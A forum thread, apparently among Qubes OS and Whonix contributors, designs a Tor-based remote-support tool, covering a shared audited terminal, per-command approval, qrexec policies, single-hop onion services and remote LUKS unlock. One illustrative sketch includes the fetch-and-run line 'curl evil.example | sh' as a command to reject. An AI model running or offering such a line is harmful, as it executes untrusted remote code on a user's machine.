The most important thing still missing right now is a shared, contained terminal, which would mitigate the graphical UX latency over Tor. Some thoughts were exchanged, but the project scope had already been defined, so changing direction was off the table.
@adrelanos @marmarek: I lost/forgot the conclusions that were reached about such shared terminal sessions, but the last time I tested the implementation above, the screen delays and the wait for the background magic to establish the initial connection were rather dissuasive.
@alzer89 : Comments on the current implementation?
Honestly, the less the user has to do to get remote support, the better. The whole premise of requiring remote support is that the end user, for whatever reason, cannot (or does not wish to) maintain their own system. For example, journalists and political activists (even government spies) might encounter issues in the field, and need to phone home anonymously for tech support.
I can also see this as a viable solution for remote access to machines for testing. Maybe even a torified dropbear instance in the initrd to allow remote entry of the LUKS password (with a lot more thought given to it than I have just now).
Things like copying and pasting keys between VMs can already be done by the dom0 script.
Graphics (VNC) over Tor would be a bit of a stretch. I mean, it would be awesome to see, but you’re at the mercy of the Tor node you’re dealing with.
It’s already pretty capable as is, but I will post again if I think of anything else.
INFO: Install authenticated Tor onion v3 service private key with the following command in sys-whonix.
sudo sourcefile=~/QubesIncoming/disp4522/1.auth_private anon-server-to-client-install
Do as instructed in sys-whonix VM. Do not copy the command from here. Copy the command from qubes-remote-support-provider VM script output, then paste and run in sys-whonix VM. Then press enter to continue in qubes-remote-support-provider VM.
Maybe this part would be good to automate/simplify using Qubes qrexec and a dom0 GUI prompt?
What do you mean by that?
What I find cumbersome is needing to re-setup a remote support session after every reboot. I’d like an optional persistent mode. Think of systems under personal control: set it up once and it’s then always available.
There is nothing Whonix version specific in the code.
Opened a pull request just now to remove some Qubes R4.0 legacy code which might otherwise cause an erroneous impression:
(This would not break Qubes R4.0. Qubes R4.0 version is not supposed to get this change.)
Isn’t this already implemented? What else would the scripts use?
Some sort of secret needs to be securely transmitted out-of-band. The secret words already abstract that away from the user:
None of that is required from the user. I don’t see how it could possibly be simplified further, even in concept. Happy to be proven wrong.
I guess by “contained terminal” you mean “SSH audit” server functionality: a jump server / jump host which transparently logs all actions taken by the remote-support-provider?
The SSH jump server that does the logging would need to be hosted somewhere. Perhaps in a (dedicated or existing) Qubes VM. The logging would be a nice feature for transparency, even just keeping a log of all commands executed.
But security, as in preventing a compromise that goes unnoticed by the remote-support-receiver, is very hard to accomplish… See below…
Functionality wise it might be nice.
But this wouldn’t be secure. The remote-support-provider could send a long command which compromises the system and cleans up any visual evidence of itself. The remote-support-receiver might just see a flash in the shared terminal, or more likely nothing at all.
Using a console / shell directly for this would be an insecure, losing game of deny-list “whack-a-mole”. A console / shell based approach would probably be totally insecure, since these are complex, with weird shell control characters, invisible colors, and potential Unicode abuse.
An approach that can at least potentially be won would be an allow-list based approach. The remote-support-receiver would have to manually accept or reject each and every command before it is executed. This would probably require a custom program; I am not aware of such software. The remote-support-provider would get a limited SSH permission to connect to the custom program, which only permits suggesting commands to be executed on the remote-support-receiver’s computer, which can then be accepted or denied.
Then the remote-support-receiver would at least have a chance to look at commands before they are executed. Very advanced users could then avoid getting compromised if the remote-support-provider acts maliciously. But for most users, watching a sysadmin type tons of commands into a shell is probably “lost at hello” anyhow. The number of users actually capable of determining “oh, this command looks legit, accept” versus “oh, that command is malicious, reject” might be tiny. Users with such skills might not accept remote support from untrusted strangers anyhow. Perhaps a corporate 4+ eyes security concept thing.
Two different remote-support-receiver modes:
full (as of now)
permissioned (accept or deny each command)
(For lack of better terms.)
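As a rough illustration of the “permissioned” mode, the accept/deny step could be sketched as follows. This is a minimal sketch with made-up names; a real implementation would prompt the receiver interactively over a trusted terminal rather than taking the decision as an argument, and the suggested commands would arrive over the limited SSH channel described above.

```shell
# Sketch of "permissioned" mode: nothing runs until the
# remote-support-receiver explicitly accepts it. Names are hypothetical.
approve_and_run() {
    # $1: command suggested by the remote-support-provider
    # $2: the receiver's decision ("y" to accept); a real implementation
    #     would prompt on a trusted terminal instead of taking an argument
    if [ "$2" = "y" ]; then
        sh -c "$1"
    else
        echo "rejected: $1"
    fi
}

approve_and_run 'echo disk usage check' y
approve_and_run 'curl evil.example | sh' n
```

The point is only that execution happens strictly after an explicit accept; all the hard problems (rendering the command safely, avoiding control-character tricks) live in the custom program around this.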
If connection privacy isn’t important, at least in theory I have an idea how to speed it up: reduce the number of Tor relays involved from 6 to perhaps 2, with both remote-support-receiver and remote-support-provider using Tor in “single hop mode”.
Or replace the current mechanism of using Tor onions and Tor as a client for connection setup and security with some other mechanism. But which mechanism?
To have similarly good usability, it needs to support NAT-to-NAT. Otherwise either the remote-support-receiver or the remote-support-provider would need an open server port reachable from the open internet. That is cumbersome to set up: too complicated for the remote-support-receiver, and even too cumbersome for the remote-support-provider.
For a similar mechanism, NAT-to-NAT would somehow have to work using NAT hole punching. I failed to establish a NAT-to-NAT connection with both:
That’s exactly what I meant when I said dom0 could do more of the heavy lifting.
Imagine telling someone to do these steps who describes computer issues as “my computer’s ‘not working’. I don’t know, it’s just ‘broken’. I don’t know what’s wrong with it, how would I know? Isn’t that what you’re here for? Fix it now!”
I don’t think a lot of businesses would be willing to invest in training their staff to do these steps, so automating this would definitely be a plus.
It can be achieved through a series of qvm-run --pass-io and qvm-copy commands. I’ve been working on it, and will commit them when they actually work….
Sometimes it would also be helpful to be able to get a shell into a single VM (through some secure way, yet to be determined). Running qvm-run commands in dom0 without seeing the output makes troubleshooting difficult at the best of times. Would be cool to have if it didn’t “add to the attack surface” (which it probably would….).
I agree. I think that’s something corporate users would definitely find appealing and useful.
My two cents:
This could be coupled with a dropbear instance in the dom0 initramfs, for example, to allow remote entry of the LUKS password, remote wipe, and many other functions that the corporate IT world seems to love.
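For dracut-based systems, third-party initramfs SSH modules already exist (e.g. the dracut-sshd project); assuming such a module were available and the Tor part were solved separately, the dracut side might look roughly like this. The file name is an assumption, and nothing here torifies the connection:

```
# /etc/dracut.conf.d/90-remote-unlock.conf  (sketch, hypothetical file name)
# Pull networking and an early SSH daemon into the initramfs so the LUKS
# passphrase could be entered remotely. Torifying this would need extra work.
add_dracutmodules+=" network sshd "
install_items+=" /root/.ssh/authorized_keys "
```

This is just to show the rough shape of the configuration; the hard part (networking and Tor before the real system boots) is exactly what makes it a big project.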
I don’t know how I feel about having persistent open ports on a machine that isn’t a server (but I’m sure there would be ways to go about this).
All of these options would be excellent to have in the GUI somewhere (Qubes Global Settings, or Qubes Remote Support, maybe?).
I mean the script would look for the latest installed Whonix template and use that, or check which Whonix template sys-whonix is currently using, and use that.
I know it’s a simple thing to write in bash, but I just haven’t gotten it perfectly right yet….
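One way to sketch that version-picking logic in bash (the template list is faked here for illustration; in dom0 it would come from something like `qvm-ls --raw-list`):

```shell
# Pick the highest-versioned Whonix workstation template from a list of
# VM names. sort -V does the numeric version comparison.
templates='whonix-workstation-15
whonix-workstation-16
whonix-workstation-17'

latest=$(printf '%s\n' "$templates" | grep '^whonix-workstation-' | sort -V | tail -n 1)
echo "$latest"
```

`sort -V` handles the version comparison correctly even across two-digit versions (e.g. 9 vs 17), which naive string sorting gets wrong.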
I agree that it’s most likely best to do that out-of-band, but there would definitely be other ways, like utilising corporate VPNs and other protocols like I2P or Gopher (just examples, haven’t researched fully yet….).
I agree with this.
I swear, the number of times I’ve had this conversation:
Person: “Are you hacking? Oh please don’t hack me!”
Me: “Um……no….I’m editing my settings in a terminal….”
Person: “Yeah you are! Only hackers use terminals! I’m going to report you to the police!”
Me:
Maybe make this configurable as a script argument and an option in the GUI?
That is only asked for the remote-support-provider.
Not for the remote-support-receiver.
The difficult part is done by the one providing support and it’s just a simple copy/paste.
The one receiving support doesn’t need to do that.
Yeah, but even simplifying the task for the remote-support-provider would be nice.
Would this require any string parsing in dom0? I am not sure that would be acceptable, but Qubes reviewers have the final say on this. Therefore I recommend opening a pull request early as a work in progress (clearly marked WIP) to get early feedback on whether the approach is acceptable.
Otherwise a qrexec call from the qubes-remote-support-provider VM to sys-whonix (or “$sys_whonix”) might be better. That qrexec call could automate the “Install authenticated Tor onion v3 service private key” part. The default would be qrexec “ask”, I guess, and optionally, if previously set up in dom0, even qrexec “allow”.
Options for the connection:
direct, with one machine requiring an open port (mostly the remote-support-provider, and then reverse SSH)
NAT hole punching somehow
authenticated Tor onion services “default”
authenticated Tor onion services 1 hop
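For the “1 hop” variant, Tor already ships torrc options for non-anonymous single onion services; something like the following on the service side would trade the receiver’s location privacy for latency (this is a sketch of the relevant settings only, not a full torrc):

```
# torrc (sketch): single-hop "single onion service" mode.
# WARNING: this makes the onion service NON-ANONYMOUS on the service side.
HiddenServiceNonAnonymousMode 1
HiddenServiceSingleHopMode 1
```

Both options have to be set together, and a Tor instance in this mode can only run non-anonymous services, so it would need its own Tor instance separate from the receiver’s normal sys-whonix traffic.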
Certainly cool stuff but I don’t see how that’s technically possible. dom0 is non-networked by default and at initramfs boot stage, no sys-net / networking is available either. Would require a complete pre-(real)-boot mini operating system just for that purpose? WiFi passwords setup or LAN-only support? Seems like a huge additional project.
Is this about package installation? If yes, as far as I know, Qubes prefers automating package pre-installation using Qubes salt.
Even I2P might not be as fast as people are used to from the closed source remote support tools available for the Microsoft Windows platform. NAT hole punching and direct connections seems best to square this circle so to speak, covering all the requirements. Wormhole could still be used to help simplify setting up the VNC connections (so nobody has to bother with IPs, ports, etc.).
I know, and that’s excellent, but there’s no harm in making life easier for the support provider too.
The thing about any automation is that it would have to take place within dom0, because VMs can’t communicate with each other unless relaying through dom0 (I’m fully aware that you know this; just trying to fill in the gaps for anyone else who’s reading this).
At the moment, the provider does everything within a Whonix workstation dispVM, which is fine, but it means there’s no way for the connection setup process to be automated (within the current method, at least…).
I propose a qubes-remote-support-provider-setup script (name TBA, by the way) that will be placed in dom0, can be initiated from the GTK GUI app (with a text box for the wormhole words), and will initiate all the necessary steps in a disposable Whonix VM, finishing with the SSH session into the target machine.
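A very rough sketch of what that dom0 script might look like. Everything here is hypothetical (the script name, the dispVM template name, and the in-VM helper `qubes-remote-support-provider-start` are all assumptions); the `DRY_RUN` default just prints the commands that would run, so the flow can be read without a Qubes system:

```shell
#!/bin/bash
# Hypothetical dom0 sketch of qubes-remote-support-provider-setup (name TBA).
# DRY_RUN=1 (the default here) prints commands instead of executing them.
DRY_RUN="${DRY_RUN:-1}"

run() {
    if [ "$DRY_RUN" = "1" ]; then
        echo "+ $*"
    else
        "$@"
    fi
}

# The wormhole words would come from the GUI text box.
wormhole_words="${1:-example-wormhole-words}"

# Launch the (assumed) provider helper inside a disposable Whonix
# workstation, handing it the wormhole code; it would end in the
# SSH session into the target machine.
plan=$(run qvm-run --dispvm whonix-workstation-16-dvm -- \
    qubes-remote-support-provider-start "$wormhole_words")
echo "$plan"
```

`qvm-run --dispvm` is a real dom0 flag for running a command in a fresh disposable; the helper it invokes is the part that would still have to be written.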
Working on it now. Will commit when it’s usable.
I don’t think so. It would either require the strings being accessible from/in dom0, or would end up syncing between VMs via qrexec. There would be ways to do this that would tick all the boxes.
Would it be acceptable to have a persistent onion connection open? (With the end user having the option to terminate it at any time, of course…)
Am I right in saying that this opening would be useless without the SSH certificate, or a vulnerability in Tor/SSH?
In any case, this would fully rely on sys-whonix being open…
Yeah, it would probably require a bit of work, but it would definitely be a useful thing to have if you were distributing Qubes OS in the corporate world.
”I forgot my LUKS password, and I need to get my work done. What do you mean you can’t help me? You’re the IT department. What are you getting paid for?!?!”
No no. I’m just planning ahead for Whonix 17, 18, 19, etc.
At the moment, those bash scripts look for a specific Whonix version (that’s what actually got me to start tinkering with them in the first place).
I’ve committed a few tweaks to the repo to list all VMs with Whonix in the name, and to use the VM with the highest number. They still need a bit of tweaking, but they “work” at the moment.
I’ve also added a dom0 script for the provider, which “works” at the moment. Still a work in progress, though….
A Qubes Template uses qrexec to talk to Qubes UpdatesProxy in a different VM.
anon-whonix sends sdwdate status information to sdwdate-gui running on sys-whonix. This is by default allowed. For other use cases, one could say default ask, which might be appropriate here.
Therefore I don’t think dom0 modifications are required except dom0 qrexec policy files. The script running in remote-support-provider could send a qrexec command to another VM. The recipient VM is even configurable in dom0 qrexec policy (probably default sys-whonix here).
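In the Qubes R4.1+ policy format, that dom0 policy file might look roughly like this. The service name and file name are made up for illustration; only the policy syntax itself is real:

```
# /etc/qubes/policy.d/30-remote-support.policy  (hypothetical file name)
# Let the provider dispVM hand the onion auth key install request to
# sys-whonix, but ask the user first ("ask" matches the suggested default).
qubes.RemoteSupportInstallAuthKey  *  @dispvm  sys-whonix  ask
```

Switching `ask` to `allow` would give the fully automated variant discussed above, at the cost of removing the user confirmation.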
That would be good. It would make re-establishing connections easier. But it wouldn’t solve any slow connection issues.
This is what I meant by “relay through dom0”. I didn’t word it properly, my bad.
The challenge is giving a disposable Whonix VM the ability to interact with sys-whonix, and how that impacts the user experience.
Yes, adding an “ask” option would technically “work”. I’m just trying to see if there is a way to remove that user interaction for that step, to streamline it for the support provider (there is a chance that the person providing support is “just an IT employee” and could get frustrated at having to click “allow” every time, just like Windows Defender on Windows Vista!).
At the same time, having an “allow” policy from a disposable Whonix VM to sys-whonix would probably allow for all sorts of shenanigans when browsing Tor.
Either way, you’re sacrificing something, but they both “work”.
Useless for remote exploitation. Qubes users are just like 14th-century seafarers: they never leave a good port open and exposed to the elements. It’ll spoil.